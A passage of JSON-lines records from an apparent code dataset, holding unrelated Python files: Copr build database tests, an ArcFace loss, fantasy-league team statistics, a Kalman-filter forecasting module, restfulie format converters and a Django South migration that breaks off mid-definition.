\"fedora-42-x86_64\"\n\n\ndef clean_db():\n with get_sa_session() as session:\n session.query(CoprBuild).delete()\n session.query(PullRequest).delete()\n session.query(GitProject).delete()\n\n\n@pytest.fixture()\ndef a_copr_build():\n with get_sa_session() as session:\n session.query(CoprBuild).delete()\n srpm_build = SRPMBuild.create(\"asd\\nqwe\\n\")\n yield CoprBuild.get_or_create(\n pr_id=1,\n build_id=\"123456\",\n commit_sha=\"687abc76d67d\",\n repo_name=\"lithium\",\n namespace=\"nirvana\",\n web_url=\"https://copr.something.somewhere/123456\",\n target=TARGET,\n status=\"pending\",\n srpm_build=srpm_build,\n )\n clean_db()\n\n\ndef test_create_copr_build(a_copr_build):\n assert a_copr_build.pr_id == a_copr_build.pr.id\n assert a_copr_build.pr.pr_id == 1\n assert a_copr_build.build_id == \"123456\"\n assert a_copr_build.commit_sha == \"687abc76d67d\"\n assert a_copr_build.pr.project.namespace == \"nirvana\"\n assert a_copr_build.pr.project.repo_name == \"lithium\"\n assert a_copr_build.web_url == \"https://copr.something.somewhere/123456\"\n assert a_copr_build.srpm_build.logs == \"asd\\nqwe\\n\"\n assert a_copr_build.target == TARGET\n assert a_copr_build.status == \"pending\"\n # Since datetime.utcnow() will return different results in every time its called,\n # we will check if a_copr_build has build_submitted_time value thats within the past hour\n time_last_hour = datetime.utcnow() - timedelta(hours=1)\n assert a_copr_build.build_submitted_time > time_last_hour\n\n\ndef test_get_copr_build(a_copr_build):\n assert a_copr_build.id\n b = CoprBuild.get_by_build_id(a_copr_build.build_id, TARGET)\n assert b.id == a_copr_build.id\n # let's make sure passing int works as well\n b = CoprBuild.get_by_build_id(int(a_copr_build.build_id), TARGET)\n assert b.id == a_copr_build.id\n b2 = CoprBuild.get_by_id(b.id)\n assert b2.id == a_copr_build.id\n\n\ndef test_copr_build_set_status(a_copr_build):\n assert a_copr_build.status == \"pending\"\n a_copr_build.set_status(\"awesome\")\n assert a_copr_build.status == \"awesome\"\n b = CoprBuild.get_by_build_id(a_copr_build.build_id, TARGET)\n assert b.status == \"awesome\"\n\n\ndef test_copr_build_set_build_logs_url(a_copr_build):\n url = \"https://copr.fp.o/logs/12456/build.log\"\n a_copr_build.set_build_logs_url(url)\n assert 
a_copr_build.build_logs_url == url\n b = CoprBuild.get_by_build_id(a_copr_build.build_id, TARGET)\n assert b.build_logs_url == url\n\n\ndef test_get_or_create_pr():\n clean_db()\n with get_sa_session() as session:\n try:\n expected_pr = PullRequest.get_or_create(\n pr_id=42, namespace=\"clapton\", repo_name=\"layla\"\n )\n actual_pr = PullRequest.get_or_create(\n pr_id=42, namespace=\"clapton\", repo_name=\"layla\"\n )\n\n assert session.query(PullRequest).count() == 1\n assert expected_pr.project_id == actual_pr.project_id\n\n expected_pr = PullRequest.get_or_create(\n pr_id=42, namespace=\"clapton\", repo_name=\"cocaine\"\n )\n actual_pr = PullRequest.get_or_create(\n pr_id=42, namespace=\"clapton\", repo_name=\"cocaine\"\n )\n\n assert session.query(PullRequest).count() == 2\n assert expected_pr.project_id == actual_pr.project_id\n finally:\n clean_db()\n\n\ndef test_errors_while_doing_db():\n with get_sa_session() as session:\n try:\n try:\n PullRequest.get_or_create(pr_id=\"nope\", namespace=\"\", repo_name=False)\n except ProgrammingError:\n pass\n assert len(session.query(PullRequest).all()) == 0\n PullRequest.get_or_create(pr_id=111, namespace=\"asd\", repo_name=\"qwe\")\n assert len(session.query(PullRequest).all()) == 1\n finally:\n clean_db()\n","sub_path":"tests_requre/test_db.py","file_name":"test_db.py","file_ext":"py","file_size_in_byte":5602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"255868764","text":"import torch, numpy as np\n\n\"\"\"=================================================================================================\"\"\"\nALLOWED_MINING_OPS = None\nREQUIRES_BATCHMINER = False\nREQUIRES_OPTIM = True\n\n### This implementation follows the pseudocode provided in the original paper.\nclass Criterion(torch.nn.Module):\n def __init__(self, opt):\n \"\"\"\n Args:\n margin: Triplet Margin.\n \"\"\"\n super(Criterion, self).__init__()\n self.par = opt\n\n self.angular_margin = opt.loss_arcface_angular_margin\n self.feature_scale = opt.loss_arcface_feature_scale\n\n self.class_map = torch.nn.Parameter(torch.Tensor(opt.n_classes, opt.embed_dim))\n stdv = 1. / np.sqrt(self.class_map.size(1))\n self.class_map.data.uniform_(-stdv, stdv)\n\n self.name = 'arcface'\n\n self.lr = opt.loss_arcface_lr\n\n def forward(self, batch, labels, **kwargs):\n \"\"\"\n Args:\n batch: torch.Tensor: Input of embeddings with size (BS x DIM)\n labels: nparray/list: For each element of the batch assigns a class [0,...,C-1], shape: (BS x 1)\n \"\"\"\n bs, labels = len(batch), labels.to(self.par.device)\n\n class_map = torch.nn.functional.normalize(self.class_map, dim=1)\n #Note that the similarity becomes the cosine for normalized embeddings. 
Denoted as 'fc7' in the paper pseudocode.\n        cos_similarity = batch.mm(class_map.T).clamp(min=1e-10, max=1-1e-10)\n\n        pick = torch.zeros(bs, self.par.n_classes).byte().to(self.par.device)\n        pick[torch.arange(bs), labels] = 1\n\n        original_target_logit = cos_similarity[pick]\n\n        theta = torch.acos(original_target_logit)\n        marginal_target_logit = torch.cos(theta + self.angular_margin)\n\n        class_pred = self.feature_scale * (cos_similarity + (marginal_target_logit-original_target_logit).unsqueeze(1))\n        loss = torch.nn.CrossEntropyLoss()(class_pred, labels)\n\n        return loss\n","sub_path":"criteria/arcface.py","file_name":"arcface.py","file_ext":"py","file_size_in_byte":2033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"349846870","text":"#!/usr/bin/env python\n\n\"\"\"Class to handle statistics for each team\"\"\"\n\nimport logging\n\n__author__ = 'Ryne Carbone'\n\nlogger = logging.getLogger(__name__)\n\n\nclass TeamStats:\n  '''Keep track of team stats'''\n  def __init__(self, data):\n    self.faab = data['teamTransactions']['acquisitionBudgetSpent']\n    self.trans = data['teamTransactions']['overallAcquisitionTotal']\n    self.trades = data['teamTransactions']['trades']\n    self.waiver = data['waiverRank']\n    self.wins = 0.\n    self.losses = 0.\n    self.streak = 0.\n    self.streak_sgn = 1.\n    self.pointsFor = 0.\n    self.pointsAgainst = 0.\n    self.schedule = []\n    self.home_away = [] # 0: home 1: away \n    self.scores = []\n    self.mov = []\n    self.awp = 0.\n    self.awins = 0.\n    self.alosses = 0.\n  def __repr__(self):\n    # __repr__ must return a string; the original printed each field and returned None\n    lines = ['             FAAB : %s'%self.faab,\n             '     Transactions : %s'%self.trans,\n             '           Trades : %s'%self.trades,\n             '           Waiver : %s'%self.waiver,\n             '             Wins : %s'%self.wins,\n             '           Losses : %s'%self.losses,\n             '           Streak : %s'%self.streak,\n             '      Streak Sign : %s'%self.streak_sgn,\n             '       Points For : %s'%self.pointsFor,\n             '   Points Against : %s'%self.pointsAgainst,\n             '         Schedule : %s'%self.schedule,\n             'Home (0) Away (1) : %s'%self.home_away,\n             '           Scores : %s'%self.scores,\n             'Margin of Victory : %s'%self.mov,\n             '   Aggregate wpct : %s'%self.awp,\n             '   Aggregate wins : %s'%self.awins,\n             ' Aggregate losses : %s'%self.alosses]\n    return '\\n'.join(lines)\n  def _replace_opponents(self, teams):\n    '''Replace team id number with team object'''\n    logger.debug('Replacing opponents in team schedule')\n    for week, matchup in enumerate(self.schedule):\n      for opponent in teams:\n        if matchup == opponent.teamId:\n          self.schedule[week] = opponent\n  def _calc_mov(self):\n    '''Calculate the margin of victory'''\n    logger.debug('Calculating the margin of victory for each game in schedule')\n    for week, opponent in enumerate(self.schedule):\n      mov = self.scores[week] - opponent.stats.scores[week]\n      self.mov.append(mov)\n  def _calc_wins_losses(self,teamId, week, teams):\n    '''Recalculates based on specified week:\n       points for, points against\n       wins, losses, streak\n       aggregate wins, aggregate losses,\n       aggregate wpct'''\n    logger.debug('Recalculating points, wins/losses, aggregate wins/losses based on week')\n    self.awins = 0. # aggregate wins\n    self.alosses = 0. # aggregate losses\n    self.pointsFor = 0. # points for\n    self.pointsAgainst = 0. 
# points against\n self.wins = 0\n self.losses = 0\n self.streak = 0 # streak\n self.streak_sgn = 1 # sign of streak\n # Loop over weeks, retreive score and week's opponent\n for w, (s, w_o) in enumerate(zip(self.scores[:week], self.schedule[:week])):\n # points for, against, wins, losses, streak, sign\n self.pointsFor += s\n self.pointsAgainst += w_o.stats.scores[w]\n # Score more than opponent\n if s > w_o.stats.scores[w]:\n self.wins += 1\n if self.streak_sgn == -1:\n self.streak_sgn = 1\n self.streak = 1\n else: self.streak += 1\n # Score less than opponent\n else:\n self.losses += 1\n if self.streak_sgn == 1:\n self.streak_sgn = -1\n self.streak = 1\n else: self.streak += 1\n # aggregate wins/losses\n for o in teams:\n if o.teamId != teamId:\n if s > o.stats.scores[w]:\n self.awins += 1\n else:\n self.alosses += 1\n # Update aggregate win pct\n self.awp = float(self.awins)/(float(self.awins)+float(self.alosses))\n","sub_path":"power_ranker/stats.py","file_name":"stats.py","file_ext":"py","file_size_in_byte":3901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"461931738","text":"'''\n.. module:: kf.fast_2\n\n :synopsis: LKFFB implementation leveraging speed of kf.fast (memoryless filtering) but\n retaining some information about state variables. Facilitates exploration of different\n Prediction methods ('ZeroGain' or 'PropForward') and maximallly generic choices\n of apriori basis for LKFFB (Basis 'A', 'B', or 'C').\n\n Module Level Functions:\n ----------------------\n makePropForward : Return learned parameters from\n msmt_record via LKFFB and make predictions for timesteps > n_train.\n detailed_kf : Return LKFFB predictions and spectral amplitude information\n and save light LKFFB analysis as .npz file.\n\n.. moduleauthor:: Riddhi Gupta \n\n'''\nimport numpy as np\n#import numba as nb\nimport numpy.linalg as la\n\nfrom kf.common import (\n calc_inst_params, calc_pred, calc_Gamma, get_dynamic_model,\n propagate_states, calc_Kalman_Gain, calc_residuals\n)\n\n#@nb.jit(nopython=True) \ndef makePropForward(freq_basis_array, x_hat, Delta_T_Sampling, phase_correction_noisetraces, num, n_train, numf):\n ''' Extracts learned parameters from Kalman Filtering msmt_record and makes\n predictions for timesteps > n_train.\n\n Parameters:\n ----------\n freq_basis_array (`float64`): Array containing `numf` number of basis frequencies.\n x_hat (`float64`): Aposteriori KF estimates based on msmt_record.\n Delta_T_Sampling (`float64`): Time interval between measurements.\n phase_correction_noisetraces (`float64`): Applies depending on choice of basis\n num (`int`): Number of points in msmt_record.\n n_train (`int`): Predicted timestep at which algorithm is expected to finish learning.\n numf (`int`): Number of spectral basis frequencies in freq_basis_array.\n\n Returns:\n -------\n Propagate_Foward (`float64`): Output predictions. 
for tn in range(n_train, num, 1):\n Propagate_Foward[tn] = instantA[0]*np.cos((Delta_T_Sampling*tn*freq_basis_array[0]*2*np.pi + instantP[0]))\n Propagate_Foward[tn] += np.sum(instantA[1:]*np.cos((Delta_T_Sampling*tn*freq_basis_array[1:]*2*np.pi + instantP[1:] + phase_correction_noisetraces))) # with correction for noise traces \n\n return Propagate_Foward, instantA, instantP\n\n\nZERO_GAIN, PROP_FORWARD = range(2)\nPredictionMethod = {\n \"ZeroGain\": ZERO_GAIN, \n \"PropForward\": PROP_FORWARD\n}\n\n
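# Minimal call sketch (hypothetical sizes and hyperparameters; see the docstring below for argument meanings):\n# predictions, x_hat_history = kf_2017(y_signal, n_train=2000, n_testbefore=50,\n#     n_predict=100, Delta_T_Sampling=0.001, x0=1.0, p0=10000.0, oe=0.1, rk=1.0,\n#     freq_basis_array=np.arange(0.0, 51.0), prediction_method=\"PropForward\",\n#     switch_off_save='Yes')\n\n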
def kf_2017(y_signal, n_train, n_testbefore, n_predict, Delta_T_Sampling, x0, p0, oe, \n rk, freq_basis_array, phase_correction=0 ,prediction_method=\"ZeroGain\", \n skip_msmts=1, descriptor='Fast_KF_Results', switch_off_save='No', quantised='No'):\n ''' Return LKFFB predictions and save LKFFB analysis as .npz file.\n\n Parameters:\n ----------\n y_signal (`float64`): Array containing measurements for Kalman Filtering [Dim: 1 x num].\n n_train (`int`): Timestep at which algorithm is expected to finish learning.\n n_testbefore (`int`): Number of one-step-ahead predictions prior to n_train\n which user requires to be returned as output.\n n_predict (`int`): Predictions outside of msmt data.\n Delta_T_Sampling (`float64`): Time interval between measurements.\n x0 (`float64`): x_hat_initial : Initial condition for state estimate, x(0), for all basis\n frequencies.\n p0 (`float64`): P_hat_initial : Initial condition for state covariance estimate, P(0),\n for all basis frequencies.\n oe (`float64`): oekalman : Process noise covariance strength.\n rk (`float64`): rkalman : Measurement noise covariance strength.\n freq_basis_array (`float64`): Array containing basis frequencies.\n phase_correction (`float64`): Phase correction term as dependent on choice \n of built-in Basis and Prediction Method.\n prediction_method : Use ZeroGain OR PropForward with Phase Correction.\n skip_msmts : Allow a non-zero Kalman gain for every n-th msmt,\n where skip_msmts == n and skip_msmts=1 implies all measurements\n can have a non-zero gain.\n\n Known Information for Filter Design:\n -------------------------------------------------------\n a -- Linearised dynamic model - time invariant [Dim: twonumf x twonumf. dtype = float64]\n h -- Linear measurement action - time invariant [Dim: 1 x twonumf. dtype = float64]\n Gamma2, Gamma -- Process noise features [Dim: twonumf x 1. dtype = float64]\n Q -- Process noise covariance.[Dim: twonumf x twonumf. dtype = float64]\n R -- Measurement noise covariance; equivalent to rkalman for scalar measurement\n noise. [Scalar float64]\n\n Variables for State Estimation and State Covariance Estimation:\n ---------------------------------------------------------------\n x_hat -- Aposteriori estimates (real and estimated imaginary components\n of the state for each basis frequency) [Len: twonumf. dtype = float64].\n x_hat_apriori -- Apriori estimates (real and estimated imaginary components\n of the state for each basis frequency) [Len: twonumf. dtype = float64].\n z_proj -- Apriori predicted measurement [Scalar float64]\n e_z -- Residuals, i.e. z - z_proj [Len: num float64]\n S -- Predicted output covariance estimate (i.e. uncertainty in z_proj)\n [Scalar float64].\n S_inv -- Inverse of S (NB: R must be a positive definite if S is not Scalar)\n [Scalar float64].\n W -- Kalman gain [Dim: twonumf x 1. dtype = float64]\n P_hat -- Aposteriori state covariance estimate (i.e. aposteriori uncertainty\n in estimated x_hat) [Dim: twonumf x twonumf. dtype = float64]\n P_hat_apriori -- Apriori state covariance estimate (i.e. apriori uncertainty in\n estimated x_hat) [Dim: twonumf x twonumf. dtype = float64]\n\n Returns:\n --------\n predictions (`float64`): Output predictions [Len: n_testbefore + n_predict].\n InstantA (`float64`): Instantaneous amplitudes at n_train used for generating predictions\n using Prop Forward [len: numf].\n\n Dimensions:\n -----------\n num (`int`): Number of points in msmt_record.\n numf (`int`): Number of points (spectral basis frequencies) in freq_basis_array.\n twonumf (`int`): 2*numf. (NB: For each basis freq in freq_basis_array, estimators\n have real and imaginary parts).\n\n '''\n\n return _kf_2017(y_signal, n_train, n_testbefore, n_predict, Delta_T_Sampling, x0, p0, oe, rk, freq_basis_array, phase_correction, PredictionMethod[prediction_method], skip_msmts, descriptor, switch_off_save, quantised)\n\n\ndef _kf_2017(y_signal, n_train, n_testbefore, n_predict, Delta_T_Sampling, x0, p0, oe, rk, freq_basis_array, phase_correction, prediction_method_, skip_msmts, descriptor, switch_off_save, quantised):\n ''' [Wrapper Function] See kf_2017 docstring for detailed definitions. '''\n num = n_train + n_predict\n numf = len(freq_basis_array)\n twonumf = int(numf*2.0)\n\n # Kalman Measurement Data\n z = np.zeros(num)\n z[:] = y_signal\n\n # State Estimation\n x_hat_apriori = np.zeros((twonumf,1)) \n x_hat = np.zeros((twonumf,1))\n e_z = np.zeros(num)\n P_hat_apriori = np.zeros((twonumf,twonumf)) \n P_hat = np.zeros((twonumf,twonumf))\n\n # Dynamical Model\n a = get_dynamic_model(twonumf, Delta_T_Sampling, freq_basis_array, coswave=-1)\n\n # Measurement Action\n h = np.zeros((1,twonumf)) \n h[0,::2] = 1.0\n\n # Initial Conditions\n x_hat[:,0] = x0 \n diag_indx = range(0,twonumf,1)\n P_hat[diag_indx, diag_indx] = p0\n\n store_x_hat = np.zeros((twonumf,1,num))\n store_P_hat = np.zeros((twonumf,twonumf,num))\n store_x_hat[:,:,0] = x_hat\n store_P_hat[:,:,0] = P_hat \n\n store_W = np.zeros((twonumf,1,num)) \n store_S_Outer_W = np.zeros((twonumf,twonumf,num))\n store_Q = np.zeros((twonumf,twonumf,num))\n store_S = np.zeros((1,1,num))\n predictions = np.zeros(n_testbefore + n_predict)\n \n # Start Filtering\n k = 1\n while (k< num): \n \n x_hat_apriori, P_hat_apriori, store_Q[:,:, k]= propagate_states(a, x_hat, P_hat, oe, numf)\n \n if prediction_method_ == ZERO_GAIN and k> (n_train):\n # This branch is equivalent to setting the gain to zero \n x_hat = x_hat_apriori\n store_x_hat[:,:,k] = x_hat\n P_hat = P_hat_apriori\n store_P_hat[:,:,k] = P_hat\n k = k+1 \n continue \n \n W, S = calc_Kalman_Gain(h, P_hat_apriori, rk, quantised=quantised, x_hat_apriori=x_hat_apriori) \n store_S[:,:, k] = S\n \n #Skip msmts \n if k % skip_msmts !=0:\n W = np.zeros((twonumf, 1))\n \n e_z[k] = calc_residuals(h, x_hat_apriori, z[k], quantised=quantised)\n \n x_hat = x_hat_apriori + W*e_z[k]\n store_S_Outer_W[:,:,k] = S*np.outer(W,W.T)\n P_hat = P_hat_apriori - S*np.outer(W,W.T) #Equivalent to outer(W, W)\n \n store_x_hat[:,:,k] = x_hat\n store_P_hat[:,:,k] = P_hat \n store_W[:,:,k] = W\n\n \n 
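# With \"PropForward\" the function returns from inside this loop at\n # k == n_train: learned amplitudes/phases are frozen there and extrapolated\n # as harmonic sums, so measurements beyond n_train are not consumed.\n 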
if prediction_method_ == PROP_FORWARD and (k==n_train):\n \n # This branch initiates propagation forward at n_train\n Propagate_Foward, instantA, instantP = makePropForward(freq_basis_array, x_hat,Delta_T_Sampling,phase_correction,num,n_train,numf)\n # We use previous state estimates to \"predict\" for n < n_train\n predictions[0:n_testbefore] = calc_pred(store_x_hat[:,:,n_train-n_testbefore:n_train])\n # We use Prop Forward to \"forecast\" for n> n_train\n predictions[n_testbefore:] = Propagate_Foward[n_train:]\n \n if switch_off_save == 'Yes':\n return predictions, store_x_hat\n \n np.savez(descriptor, \n descriptor=descriptor,\n predictions=predictions, \n y_signal=y_signal,\n freq_basis_array= freq_basis_array, \n x_hat=store_x_hat, \n P_hat=store_P_hat, \n a=a,\n h=h,\n z=z, \n e_z=e_z,\n W=store_W,\n Q=store_Q,\n store_S_Outer_W=store_S_Outer_W,\n S=store_S,\n instantA=instantA,\n instantP=instantP,\n oe=oe, \n rk=rk,\n n_train=n_train,\n n_predict=n_predict,\n n_testbefore=n_testbefore,\n skip_msmts=skip_msmts,\n Propagate_Foward=Propagate_Foward,\n phase_correction=phase_correction)\n \n return predictions\n \n k=k+1\n \n predictions = calc_pred(store_x_hat[:,:,n_train-n_testbefore:], quantised=quantised)\n \n if switch_off_save == 'Yes':\n return predictions, store_x_hat\n\n np.savez(descriptor, descriptor=descriptor,\n predictions=predictions, \n y_signal=y_signal,\n freq_basis_array= freq_basis_array, \n x_hat=store_x_hat, \n P_hat=store_P_hat, \n a=a,\n h=h,\n z=z,\n e_z=e_z,\n W=store_W,\n Q=store_Q,\n store_S_Outer_W=store_S_Outer_W,\n S=store_S,\n oe=oe, \n rk=rk,\n n_train=n_train,\n n_predict=n_predict,\n n_testbefore=n_testbefore,\n skip_msmts=skip_msmts)\n \n return predictions\n\n","sub_path":"kf/fast_2.py","file_name":"fast_2.py","file_ext":"py","file_size_in_byte":12018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"}
+{"seq_id":"604777026","text":"import json\nfrom xml.etree import ElementTree\nfrom opensearch import OpenSearchDescription\nfrom links import Links\n\n\nclass Converters(object):\n \"\"\"\n Utility methods for converters.\n \"\"\"\n\n types = {}\n\n @staticmethod\n def register(a_type, converter):\n \"Register a converter for the given type.\"\n Converters.types[a_type] = converter\n\n @staticmethod\n def marshaller_for(a_type):\n \"\"\"\n Return a converter for the given type.\n \"\"\"\n return Converters.types.get(a_type) or XmlConverter()\n\n\nclass JsonConverter(object):\n \"\"\"\n Converts objects from and to JSON.\n \"\"\"\n \n def marshal(self, content):\n \"\"\"\n Produces a JSON representation of the given content.\n \"\"\"\n return json.dumps(content)\n\n def unmarshal(self, json_content):\n \"\"\"\n Produces an object for a given JSON content.\n \"\"\"\n return _dict2obj(json.loads(json_content))\n\n\nclass _dict2obj(object):\n def __init__(self, dict_):\n for key, value in dict_.items():\n if isinstance(value, (list, tuple)):\n d = [_dict2obj(x) if isinstance(x, dict) else x for x in value]\n setattr(self, key, d)\n else:\n d = _dict2obj(value) if isinstance(value, dict) else value\n setattr(self, key, d)\n\n\n
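# Usage sketch (illustrative): JsonConverter().unmarshal('{\"a\": {\"b\": 1}}').a.b\n# yields 1, since _dict2obj recursively maps dict keys onto attributes;\n# marshaller_for falls back to XmlConverter for unregistered types.\n\n\n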
class XmlConverter(object):\n \"\"\"\n Converts objects from and to XML.\n \"\"\"\n \n def marshal(self, content):\n \"\"\"\n Produces an XML representation of the given content.\n \"\"\"\n return ElementTree.tostring(self._dict_to_etree(content))\n\n def _dict_to_etree(self, content):\n root_key = list(content.keys())[0] # list() for Python 3 compatibility\n tree = ElementTree.Element(root_key)\n self._dict_to_etree_rec(content[root_key], tree)\n return tree\n\n def _dict_to_etree_rec(self, content, tree):\n if isinstance(content, dict):\n for key, value in content.items():\n e = ElementTree.Element(key)\n self._dict_to_etree_rec(value, e)\n tree.append(e)\n else:\n tree.text = str(content)\n\n def unmarshal(self, content):\n \"\"\"\n Produces an ElementTree object for a given XML content.\n \"\"\"\n e = ElementTree.fromstring(content)\n return self._enhance_element_tree(e)\n\n def _enhance_element_tree(self, e):\n for element in e.iter():\n for child in list(element):\n if len(element.findall(child.tag)) > 1:\n setattr(element, child.tag, element.findall(child.tag))\n elif len(list(child)) == 0:\n setattr(element, child.tag, child.text)\n else:\n setattr(element, child.tag, element.find(child.tag))\n\n l = []\n for element in e.iter('link'):\n d = {'href': element.attrib.get('href'),\n 'rel': element.attrib.get('rel'),\n 'type': element.attrib.get('type') or 'application/xml'}\n\n l.append(d)\n\n e.links = lambda: Links(l)\n e.link = lambda x: e.links().get(x)\n\n return e\n\n\nclass OpenSearchConverter(object):\n def marshal(self, content):\n return XmlConverter().marshal(content)\n\n def unmarshal(self, content):\n e_tree = ElementTree.fromstring(content)\n return OpenSearchDescription(e_tree)\n\n\nclass PlainConverter(object):\n def marshal(self, content):\n return content\n\n def unmarshal(self, content):\n return content\n\nConverters.register('application/xml', XmlConverter())\nConverters.register('text/xml', XmlConverter())\nConverters.register('xml', XmlConverter())\nConverters.register('text/plain', PlainConverter())\nConverters.register('text/json', JsonConverter())\nConverters.register('application/json', JsonConverter())\nConverters.register('json', JsonConverter())\nConverters.register('application/opensearchdescription+xml',\n OpenSearchConverter())\n","sub_path":"restfulie/converters.py","file_name":"converters.py","file_ext":"py","file_size_in_byte":3986,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"}
+{"seq_id":"38502418","text":"\nimport datetime\n\nfrom south.db import db\nfrom django.db import models\nfrom kong.models import *\n\nclass Migration:\n \n def forwards(self, orm):\n \n # Adding model 'TestResult'\n db.create_table('kong_testresult', (\n ('id', models.AutoField(primary_key=True)),\n ('test', models.ForeignKey(orm.Test, related_name='test_results')),\n ('site', models.ForeignKey(orm.Site, related_name='test_results')),\n ('run_date', models.DateTimeField(default=datetime.datetime.now)),\n ('duration', models.IntegerField(null=True)),\n ('succeeded', models.BooleanField()),\n ('content', models.TextField()),\n ))\n db.send_create_signal('kong', ['TestResult'])\n \n # Adding model 'Server'\n db.create_table('kong_server', (\n ('id', models.AutoField(primary_key=True)),\n ('name', models.CharField(max_length=80, blank=True)),\n ('slug', models.SlugField()),\n ('hostname', models.CharField(max_length=100)),\n ('internalip', models.IPAddressField(null=True, blank=True)),\n ('externalip', models.IPAddressField(null=True, blank=True)),\n ))\n db.send_create_signal('kong', ['Server'])\n \n # Adding model 'HostedSite'\n db.create_table('kong_hostedsite', (\n ('site_ptr', models.OneToOneField(orm['kong.Site'])),\n ('servername', models.CharField(default='example.com', max_length=100)),\n ('maxclients', models.IntegerField(default=30, null=True, blank=True)),\n ('wsgi_processes', models.IntegerField(default=5, null=True, blank=True)),\n ('wsgi_max_requests', models.IntegerField(default=500, 
null=True, blank=True)),\n ('serveradmin', models.CharField(max_length=100, null=True, blank=True)),\n ('mediaserver', models.CharField(max_length=100, null=True, blank=True)),\n ))\n db.send_create_signal('kong', ['HostedSite'])\n \n # Adding model 'Client'\n db.create_table('kong_client', (\n ('id', models.AutoField(primary_key=True)),\n ('name', models.CharField(max_length=100, blank=True)),\n ('slug', models.SlugField(blank=True)),\n ('phone', USmodels.PhoneNumberField(blank=True)),\n ('email', models.EmailField(blank=True)),\n ('contact', models.CharField(max_length=100, blank=True)),\n ))\n db.send_create_signal('kong', ['Client'])\n \n # Adding model 'Site'\n db.create_table('kong_site', (\n ('id', models.AutoField(primary_key=True)),\n ('name', models.CharField(max_length=80, blank=True)),\n ('slug', models.SlugField()),\n ('type', models.ForeignKey(orm.Type, related_name='sites')),\n ('client', models.ForeignKey(orm.Client, related_name='sites', null=True, blank=True)),\n ('settings', models.CharField(max_length=80)),\n ('pythonpath', models.CharField(default='/home/code.django-1.0', max_length=255)),\n ('is_live', models.BooleanField(default=False)),\n ))\n db.send_create_signal('kong', ['Site'])\n \n # Adding model 'Alias'\n db.create_table('kong_alias', (\n ('id', models.AutoField(primary_key=True)),\n ('site', models.ForeignKey(orm.HostedSite, related_name=\"aliases\")),\n ('url', models.CharField(max_length=100)),\n ))\n db.send_create_signal('kong', ['Alias'])\n \n # Adding model 'Test'\n db.create_table('kong_test', (\n ('id', models.AutoField(primary_key=True)),\n ('name', models.CharField(max_length=250)),\n ('slug', models.SlugField(blank=True)),\n ('body', models.TextField()),\n ))\n db.send_create_signal('kong', ['Test'])\n \n # Adding model 'DeployTarget'\n db.create_table('kong_deploytarget', (\n ('id', models.AutoField(primary_key=True)),\n ('name', models.CharField(max_length=250)),\n ('slug', models.SlugField(blank=True)),\n ('is_active', models.BooleanField()),\n ('last_deployed', models.DateTimeField()),\n ))\n db.send_create_signal('kong', ['DeployTarget'])\n \n # Adding model 'Type'\n db.create_table('kong_type', (\n ('id', models.AutoField(primary_key=True)),\n ('name', models.CharField(max_length=40)),\n ('slug', models.SlugField(blank=True)),\n ))\n db.send_create_signal('kong', ['Type'])\n \n \n \n def backwards(self, orm):\n \n # Deleting model 'TestResult'\n db.delete_table('kong_testresult')\n \n # Deleting model 'Server'\n db.delete_table('kong_server')\n \n # Deleting model 'HostedSite'\n db.delete_table('kong_hostedsite')\n \n # Deleting model 'Client'\n db.delete_table('kong_client')\n \n # Deleting model 'Site'\n db.delete_table('kong_site')\n \n # Deleting model 'Alias'\n db.delete_table('kong_alias')\n \n # Deleting model 'Test'\n db.delete_table('kong_test')\n \n # Deleting model 'DeployTarget'\n db.delete_table('kong_deploytarget')\n \n # Deleting model 'Type'\n db.delete_table('kong_type')\n \n \n \n models = {\n 'kong.testresult': {\n 'Meta': {'ordering': \"('-run_date',)\"},\n 'content': ('models.TextField', [], {}),\n 'duration': ('models.IntegerField', [], {'null': 'True'}),\n 'id': ('models.AutoField', [], {'primary_key': 'True'}),\n 'run_date': ('models.DateTimeField', [], {'default': 'datetime.datetime.now'}),\n 'site': ('models.ForeignKey', [\"orm['kong.Site']\"], {'related_name': \"'test_results'\"}),\n 'succeeded': ('models.BooleanField', [], {}),\n 'test': ('models.ForeignKey', [\"orm['kong.Test']\"], {'related_name': 
\"'test_results'\"})\n },\n 'kong.server': {\n 'clients': ('ManyToManyField_NoSyncdb', [\"orm['kong.HostedSite']\"], {'db_table': \"'kong_hostedsite_on_servers'\"}),\n 'externalip': ('models.IPAddressField', [], {'null': 'True', 'blank': 'True'}),\n 'hostname': ('models.CharField', [], {'max_length': '100'}),\n 'id': ('models.AutoField', [], {'primary_key': 'True'}),\n 'internalip': ('models.IPAddressField', [], {'null': 'True', 'blank': 'True'}),\n 'name': ('models.CharField', [], {'max_length': '80', 'blank': 'True'}),\n 'slug': ('models.SlugField', [], {})\n },\n 'kong.hostedsite': {\n 'Meta': {'_bases': ['kong.models.Site']},\n 'maxclients': ('models.IntegerField', [], {'default': '30', 'null': 'True', 'blank': 'True'}),\n 'mediaserver': ('models.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),\n 'on_servers': ('models.ManyToManyField', [\"orm['kong.Server']\"], {'related_name': '\"sites\"', 'null': 'True', 'blank': 'True'}),\n 'serveradmin': ('models.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),\n 'servername': ('models.CharField', [], {'default': \"'example.com'\", 'max_length': '100'}),\n 'site_ptr': ('models.OneToOneField', [\"orm['kong.Site']\"], {}),\n 'wsgi_max_requests': ('models.IntegerField', [], {'default': '500', 'null': 'True', 'blank': 'True'}),\n 'wsgi_processes': ('models.IntegerField', [], {'default': '5', 'null': 'True', 'blank': 'True'})\n },\n 'kong.client': {\n 'contact': ('models.CharField', [], {'max_length': '100', 'blank': 'True'}),\n 'email': ('models.EmailField', [], {'blank': 'True'}),\n 'id': ('models.AutoField', [], {'primary_key': 'True'}),\n 'name': ('models.CharField', [], {'max_length': '100', 'blank': 'True'}),\n 'phone': ('USmodels.PhoneNumberField', [], {'blank': 'True'}),\n 'slug': ('models.SlugField', [], {'blank': 'True'})\n },\n 'kong.site': {\n 'client': ('models.ForeignKey', [\"orm['kong.Client']\"], {'related_name': \"'sites'\", 'null': 'True', 'blank': 'True'}),\n 'id': ('models.AutoField', [], {'primary_key': 'True'}),\n 'is_live': ('models.BooleanField', [], {'default': 'False'}),\n 'name': 